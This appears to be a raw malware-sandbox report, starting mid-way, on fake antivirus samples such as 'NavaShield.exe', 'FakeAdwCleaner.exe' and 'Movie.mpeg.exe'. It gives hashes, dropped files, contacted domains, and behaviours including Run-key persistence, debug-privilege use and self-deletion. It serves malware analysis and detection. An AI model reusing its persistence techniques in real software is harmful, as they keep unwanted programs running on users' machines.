SHA1 e6b77af6c639972c9ab7454b30f5af82b6a94979
SHA256 2340db009847570b9e450cff93337eedf42b1d98b3c37c9b5505ef0bead7ebc2
SHA512 e1a1b9e34bf48ea421d4872f69f453a220d1a4db77b6ef3c0e700bb13000042709201eab2aa3b523243f9433eeef3fe26432e88e2d7b7ab943d8263dbf11acd4

memory/64-607-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-609-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-611-0x0000000013140000-0x0000000013764000-memory.dmp

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 d6b6ca70350c95f725f3ac8246d19809
SHA1 b9055b5232e1c60a57d35b79ecd13ca71348b46c
SHA256 e305e08757de10965c96651bdcbc89b961f2af2fee089546b6a672ece7373573
SHA512 eabb4fe5a79a3e2c476259b9bc1b9cdb47359e403c219f09a5b71276d40fdc7cfdeed97c16c91234f487cd36418c089a90a910093268b7ca494acdb7f1f8742f

memory/64-615-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-618-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-619-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-620-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-621-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-622-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-623-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-624-0x0000000013140000-0x0000000013764000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

92s

Max time network

114s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2884 -ip 2884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 588

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
IE 52.111.236.21:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp

Files

memory/2884-0-0x00000000006B0000-0x00000000006B1000-memory.dmp

memory/2884-1-0x0000000001000000-0x00000000010CE000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

151s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe"

Signatures

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation | C:\Nava Labs\Nava Shield\NavaShield.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Nava Labs\Nava Shield\NavaShield.exe | N/A
N/A | N/A | C:\Nava Labs\Nava Shield\NavaBridge.exe | N/A
N/A | N/A | C:\Nava Labs\Nava Shield\NavaDebugger.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NavaShield = "c:\\Nava Labs\\Nava Shield\\navashield.exe" | C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe | N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Nava Labs\Nava Shield\NavaShield.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Nava Labs\Nava Shield\NavaShield.exe | N/A

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Nava Labs\Nava Shield\NavaShield.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Nava Labs\Nava Shield\NavaShield.exe | N/A
N/A | N/A | C:\Nava Labs\Nava Shield\NavaShield.exe | N/A
N/A | N/A | C:\Nava Labs\Nava Shield\NavaShield.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Nava Labs\Nava Shield\NavaShield.exe | N/A
N/A | N/A | C:\Nava Labs\Nava Shield\NavaShield.exe | N/A
N/A | N/A | C:\Nava Labs\Nava Shield\NavaShield.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe"

C:\Nava Labs\Nava Shield\NavaShield.exe

"C:\Nava Labs\Nava Shield\NavaShield.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x514 0x510

C:\Nava Labs\Nava Shield\NavaBridge.exe

"C:\Nava Labs\Nava Shield\NavaBridge.exe"

C:\Nava Labs\Nava Shield\NavaDebugger.exe

"C:\Nava Labs\Nava Shield\NavaDebugger.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp
US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 204.79.197.200:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | navashield.com | udp
DE | 64.190.63.222:80 | navashield.com | tcp
US | 8.8.8.8:53 | 222.63.190.64.in-addr.arpa | udp
US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp

Files

memory/1264-11-0x0000000000400000-0x000000000047A000-memory.dmp

C:\Nava Labs\Nava Shield\NavaDebugger Libs\MD5.dll

MD5 831295342c47b770bf7cc591a6916fa7
SHA1 2c9063fbf3f3363526abdc241bf90618b82446d1
SHA256 8341ecc0938ca6d90b7e0f02af2d7e6b571c948a03a99d54af61c4557c78d656
SHA512 01419defe963a987989cddb0e21cf651ec3eefeae97cf4b257d4caa8da26436a647e8e4d95cdad22bbb0657171f6d3d9c41dc6fb217ffc7d5172ebc9a409d36e

C:\Nava Labs\Nava Shield\NavaDebugger.exe

MD5 404501846c15ee0774025ded425d4707
SHA1 87c4af4698aa2294b53fe4c6349ff552cfa38356
SHA256 660cc09f9d69a1ff879a811b765e1fa898081019d029d77cf833a9a915ae9873
SHA512 4bbb20aea92140c1057e9131141a543c0d3bf46578f92a0b2fc8448b4b8fc106b98a5d44212f6c197d1ec77dbac32d7cb21935fcc72ef31b339c5b8e3080dec6

C:\Nava Labs\Nava Shield\NavaShield Libs\Internet Encodings.dll

MD5 de5eefa1b686e3d32e3ae265392492bd
SHA1 7b37b0ac1061366bf1a7f267392ebc0d606bb3db
SHA256 a50e56dfb68410a7927ecd50f55044756b54868e920e462671162d1961bfe744
SHA512 c71270a5275f91214444449be4923a70243a9e2cd06afcc6fd28ab9f2cd2d930219ce8ed9ec008750b2611b62ed26b65cb57a75c6035201cd9657263d157d508

C:\Users\Admin\AppData\Local\Temp\$inst\0001.tmp

MD5 4fe19c390d4cbaaa6faae51a9131923c
SHA1 a3c114ab35f37b0444939ae479ed33a3a5ee6f13
SHA256 b95cbd2158693bbd3cefedfdc40cf4acae63883fa17ec4e9f8a38fb7b4593c1b
SHA512 a7ea9145e9dfeb36adc13bdb2ccc286ab946a219899cb25b384e3788a90b43ee40c88584c64cbb77de074b8ff92fb8db9bd2b68af47b0a11d779c96bc154f24d

C:\Nava Labs\Nava Shield\NavaShield.exe

MD5 310ee3a3e78d0b21e6e09225a80f6cc0
SHA1 b0e1cd52ef63f0ad14049fc4237875794c4f5ecc
SHA256 20201d9a8462d9b26908b6482044610c7e1551f0b8e981cae20c2510af0ed12b
SHA512 dc6112b43cad6fc13b8976c833231e38809880a966ae544803c0499257e78289b265c0b27d901e2593b554c366eb1cf3372033ab1ca3f492ab81fc52a062d8d8

C:\Nava Labs\Nava Shield\NavaShield.exe

MD5 69f41559fca633978b2bd4032b5c0a49
SHA1 5fcf9c203b39a7e0ee2a9c92541149310cbe20fa
SHA256 7d95aa92c14e385bc35087e143a3bff894c34974da1310c9c5cc9ec4ea17e82c
SHA512 e1945fe0db154b5ad6e1e707b89dfd3f1f1d3191d618c8be549e5a7d9ee13bcd1b7a69f8a1f916b9588b756f0e78f19c89df39d99c709e8325c08af55e580744

memory/1264-110-0x0000000000400000-0x000000000047A000-memory.dmp

memory/4656-117-0x00000000026A0000-0x00000000029BB000-memory.dmp

memory/4656-116-0x0000000003E30000-0x0000000003E42000-memory.dmp

memory/4656-121-0x0000000003E60000-0x0000000003E7A000-memory.dmp

C:\Nava Labs\Nava Shield\config.dat

MD5 b0f4924346d2daa81a9f7d241a987d6c
SHA1 190356e26e8054f338d1f4b6a4e582e02149f7fa
SHA256 da4728e17ae412494f6b548e21b136fbb830abc4a2bac5fd7c1522a2a729271c
SHA512 8eddb6eaf687aa5cb4bbdf3f0914e401dd42c488f8d68243d705608197006ee09195d39f80b6ff5b878be4e18238297bf1a38e60d82b72e3f53c7a998a8e1e1e

C:\Nava Labs\Nava Shield\NavaMod.dll

MD5 3d7f80fb0534d24f95ee377c40b72fb3
SHA1 11b443ed953dae35d9c9905b5bbeb309049f3d36
SHA256 abd84867d63a5449101b7171b1cc3907c44d7d327ea97d45b22a1015cc3af4dc
SHA512 7fc741bbce281873134b9f4d68b74ae04daf943ea4c0c26e7e44579f2d51883c635972a405dd81cee63079a5ba9d09328a1e26e7878547590569806d219d83c7

C:\Nava Labs\Nava Shield\NavaShield Libs\Appearance Pak.dll

MD5 fcf3ac25f11ba7e8b31c4baf1910f7a6
SHA1 fb470541f0b6b8f3ce69dcaa239ca9a7d7e91d72
SHA256 e5b3249fbeea8395fd56c20511bfcfdb2b2632d3c8d517b943466a4e47f97b5c
SHA512 47c467924d64af4a48a6e640778aca1dce379d16b06bf3f60a44025034c15ce1498ef307b63cb04e5c0cbb6c2ac58022acdb0d6efb1109c5ea31f842a320aa40

memory/1264-130-0x0000000000400000-0x000000000047A000-memory.dmp

memory/4656-135-0x0000000069F80000-0x0000000069F88000-memory.dmp

C:\Nava Labs\Nava Shield\NavaBridge.exe

MD5 903a4e6e78dc62bc7b9e261ff3cce399
SHA1 a6a9ae0572ab0ed14cb62441f1f1ed0d3b52d926
SHA256 0d12740248a3849bc5f92134502a95dc413fcd6be25fa6893b1c05f920ed2cb7
SHA512 31b9fb9bdaa78c18276f1d1da93ce099b19437f1fb27f0e4b0f49b82881aff40bc7d610ba755283461a6fd9c20dc669b86ff453e6b52f4633a38177bb6b89daf

C:\Nava Labs\Nava Shield\NavaBridge.exe

MD5 8c54a7f80cc21f50908023844bd88a77
SHA1 cf0f590a1c93356b77358d56311578b75b98cc57
SHA256 3bf536a387ce91a81936b4f3bb1df34d19e80b22e98c08e7b87b757075ebac67
SHA512 5e45edcb0c9c76e1c4b8ad52a2da899547416f69a3f931c04c439b2d447ce5d2fad40ea5a389645a225eb32086b65c91d37b778c6ace0764ff26d95f9f231e1f

memory/2580-141-0x00000000025B0000-0x000000000273B000-memory.dmp

C:\Nava Labs\Nava Shield\bridge.dat

MD5 e66f1107f995d52bcd90421b3cdc0dde
SHA1 245acafa2f3dab3f2b7f183d34267dcd976199c0
SHA256 45fa6eacea58e682c2ef2bb9e888cb6bf396c37b957fd144ca73c95699ad3c74
SHA512 0500f9dec5cfdfb80bc5763943deb3111ccde4b35f19ac124df2e5abde2681154977f160a42e9ef50698b0ea0cc26fc09361a3917534038f141dd047f0287c1f

C:\Nava Labs\Nava Shield\NavaDebugger.exe

MD5 bc379ff85e4b9b5886f7416d7e1014be
SHA1 f74a8db0c0c2b19ded9b22ed8ea2183388845d08
SHA256 84040973247c112d18ccf5495311df65f2bbe6b98c464cb2562549d03e8ad0ec
SHA512 95fb614a24be346c43acf572eed58a46defb4017f771453d83bfdb820f17f4ff1855d6f2c2b6822bf3f939f9bc7743adf81366e315aaf7e2816a6e5abccd668a

memory/2580-151-0x0000000002960000-0x000000000297A000-memory.dmp

memory/380-154-0x0000000002600000-0x0000000002787000-memory.dmp

C:\Nava Labs\Nava Shield\navig.dat

MD5 0bf850cb9d0aa0f4c778cc515b79bd13
SHA1 c0cb8a58cba046d2c7539025a39c8a1af81c3914
SHA256 9c4723ecb77e39e58eda9c60f532724aa3bf69de30047cc7b6522534cd423f00
SHA512 649c13f9f4fccc03ebd6cb2c3752434c69b5a8d7e9b94cac80cd98a7624bfd00648949b18cd720faf89fae050f6b523221db589a550c6ce4513e76ff0895da5b

memory/2580-147-0x0000000002940000-0x0000000002952000-memory.dmp

C:\Nava Labs\Nava Shield\NavaBridge Libs\Browser Plugin.dll

MD5 912924f628e277be9cc28a5f2a990cb9
SHA1 13c0166469a271497043a2f13e9a6a610dc2b336
SHA256 bd474c5aafcaa12f20da5ecb29e17555b953eca46b4f56588a72672a36d4a8eb
SHA512 b33b430254f9ec32ecd6224124db69af93de3cbfbaf422a0045641f7961834a67cba1b9fd97f4e0e903e27e3360301c5dba214a6b9156c4cdf8a25115b860c39

C:\Nava Labs\Nava Shield\config.dat

MD5 3cad4610cca4159318a0e77632d3ef08
SHA1 e0d3c55b5992744e5b7d938873c682601a461fc1
SHA256 8adfe6ddd57f59595cb026b09726b3146fc59b8f28183146cdd46e499d0ad527
SHA512 37034028fc483d1b3bdeea24574c1113c0fca858f09e4bf4c3aa5ffce0a3016997dc559d4b8f4b5f66be415dba9539ce4d06e05ba6c83ac1609a71aba5039c01

Analysis: behavioral15

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

121s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe"

Signatures

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\6AdwCleaner.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" | C:\Users\Admin\AppData\Local\6AdwCleaner.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\6AdwCleaner.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\6AdwCleaner.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\6AdwCleaner.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | www.vikingwebscanner.com | udp

Files

\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

memory/1928-6-0x0000000000970000-0x000000000099E000-memory.dmp

memory/1928-7-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

memory/1928-8-0x000000001ADC0000-0x000000001AE40000-memory.dmp

memory/1928-9-0x000000001ADC0000-0x000000001AE40000-memory.dmp

memory/1928-10-0x000000001ADC0000-0x000000001AE40000-memory.dmp

memory/1928-11-0x000000001ADC0000-0x000000001AE40000-memory.dmp

memory/1928-12-0x000000001ADC0000-0x000000001AE40000-memory.dmp

memory/1928-13-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

memory/1928-14-0x000000001ADC0000-0x000000001AE40000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe"

Signatures

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\6AdwCleaner.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" | C:\Users\Admin\AppData\Local\6AdwCleaner.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\6AdwCleaner.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\6AdwCleaner.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\6AdwCleaner.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

Network

Country | Destination | Domain | Proto
US | 138.91.171.81:80 | | tcp
US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp
US | 8.8.8.8:53 | www.vikingwebscanner.com | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp
US | 204.79.197.200:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp
US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp
US | 52.111.229.19:443 | | tcp
US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 178.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp

Files

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

memory/932-11-0x0000000000640000-0x000000000066E000-memory.dmp

memory/932-12-0x00007FFF99910000-0x00007FFF9A3D1000-memory.dmp

memory/932-13-0x000000001B320000-0x000000001B330000-memory.dmp

memory/932-14-0x000000001B320000-0x000000001B330000-memory.dmp

memory/932-15-0x000000001B320000-0x000000001B330000-memory.dmp

memory/932-16-0x00007FFF99910000-0x00007FFF9A3D1000-memory.dmp

memory/932-17-0x000000001B320000-0x000000001B330000-memory.dmp

memory/932-18-0x000000001B320000-0x000000001B330000-memory.dmp

memory/932-19-0x000000001B320000-0x000000001B330000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240215-en

Max time kernel

149s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe"

Signatures

Deletes itself

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Runs ping.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\goujfbdq.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1256 wrote to memory of 1304 | N/A | C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe | C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1304 | N/A | C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe | C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1304 | N/A | C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe | C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1304 | N/A | C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe | C:\Windows\SysWOW64\cmd.exe
